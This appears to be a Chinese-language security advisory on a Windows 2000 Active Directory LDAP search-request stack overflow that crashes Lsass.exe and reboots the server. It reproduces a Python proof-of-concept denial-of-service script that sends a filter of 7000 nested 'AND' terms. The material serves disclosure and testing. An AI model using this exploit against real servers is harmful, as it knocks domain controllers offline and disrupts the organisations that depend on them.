涉及程序： Win2k Active Directory 描述： Microsoft Windows 活動目錄遠程堆棧溢出缺陷 詳細： Windows Active Directory(活動目錄)是Windows 2000結構的重要組件，是Microsoft提供的強大的目錄服務系統。

Windows活動目錄的LDAP 3搜索請求功能對用戶提交請求缺少正確緩沖區邊界檢查，遠程攻擊者可利用此缺陷使Lsass.exe服務崩潰，觸發緩沖區溢出。

通過活動目錄提供的目錄服務基于LDAP協議和并使用協議存儲和獲得Active目錄對象。活動目錄中使用LDAP 3的'search request'請求功能存在問題，攻擊者如果構建超過1000個"AND"的請求，并發送給服務器，可導致觸發堆棧溢出，使Lsass.exe服務崩潰，系統會在30秒內重新啟動。

攻擊方法： CORE Security TechnologIEs Advisories （advisories@coresecurity.com）提供了如下測試方法：

下面是一段Python測試腳本：

------------------------------------ class ActiveDirectoryDos( Ldap ):

def __init__(self): self._s = None self.host = '192.168.0.1' self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com' self.port = 389 self.buffer = '' self.msg_id = 1 Ldap.__init__()

def generateFilter_BinaryOp( self, filter ): filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode() filterBuffer = self.encapsulateHeader( filter[0], filterBuffer ) return filterBuffer

def generateFilter_RecursiveBinaryOp( self, filter, numTimes): simpleBinOp = self.generateFilter_BinaryOp( filter ) filterBuffer = simpleBinOp for cnt in range( 0, numTimes ): filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp ) return filterBuffer

def searchSub( self, filterBuffer ):

self.bindRequest() self.searchRequest( filterBuffer )

def run(self, host = '', basedn = '', name = '' ):

# the Machine must not exist machine_name = 'xaxax'

filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

# execute the anonymous query print 'executing query' filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 ) self.searchSub( filterBuffer )